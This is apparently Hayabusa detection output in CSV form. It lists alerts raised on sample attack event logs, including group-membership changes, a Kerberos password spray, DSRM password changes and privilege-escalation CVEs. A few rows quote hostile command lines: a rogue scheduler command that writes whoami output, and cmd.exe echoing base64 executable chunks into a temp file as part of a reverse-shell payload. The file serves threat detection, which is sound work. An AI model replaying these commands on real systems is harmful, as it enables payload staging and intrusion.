0x58d874,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx 2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx 2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx 2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx 2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,../hayabusa-rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx 2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,../hayabusa-rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx 2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx 2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Global Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup_DomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx 2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: FAKE-COMPUTER$ | SID: S-1-5-21-4230534742-2542757381-3142984815-1168,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx 2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx 2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,../hayabusa-rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx 2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,LatMov,Protected Storage Service Access,,../hayabusa-rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx 2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: bob | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: 172.16.66.1 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: ::ffff:172.16.66.1 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx 2020-07-25 02:20:29.872 +09:00,LAPTOP-JU4M3I0E,10,high,,Process Access_Sysmon Alert,Credential Access - TeamViewer MemAccess | Src Process: C:\Users\bouss\AppData\Local\Temp\frida-b4f3ceb41e16327436594aec059ee5d5\frida-winjector-helper-32.exe | Tgt Process: C:\Program Files (x86)\TeamViewer\TeamViewer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x147a | Src PID: 18192 | Src PGUID: 00247C92-185D-5F1B-0000-0010667A1211 | Tgt PID: 2960 | Tgt PGUID: 00247C92-1562-5F1B-0000-0010318FFE10,../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_teamviewer-dumper_sysmon_10.evtx 2020-07-27 07:26:14.522 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7400 | Src PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400 | Tgt PID: 584 | Tgt PGUID: 747F3D96-F938-5F1D-0000-00104B500000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3660 | PGUID: 747F3D96-0306-5F1E-0000-0010E15F3100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 7400 | PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-F935-5F1D-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\cmdLine: c:\windows\system32\cmd.exe | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx 2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\startArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx 2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\pauseArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx 2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\queuedTime: QWORD (0x01d6667a-0xac806dc2) | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx 2020-08-02 07:58:09.443 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQALVO2SgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAADmNAAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x414 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:09.721 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 